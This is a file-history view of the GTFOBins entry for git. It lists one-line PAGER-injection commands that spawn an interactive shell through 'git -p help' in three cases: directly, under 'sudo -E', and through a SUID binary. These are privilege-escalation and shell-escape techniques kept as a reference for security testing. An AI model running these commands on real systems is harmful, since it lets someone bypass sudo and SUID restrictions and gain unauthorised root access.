GTFOBins.github.io/_gtfobins/git.md

10 lines
243 B
Markdown
Raw Normal View History

2018-07-22 13:06:54 +00:00
---
functions:
execute-interactive:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
2018-07-22 13:06:54 +00:00
sudo-enabled:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
2018-07-22 14:42:43 +00:00
suid-limited:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
2018-07-22 13:06:54 +00:00
---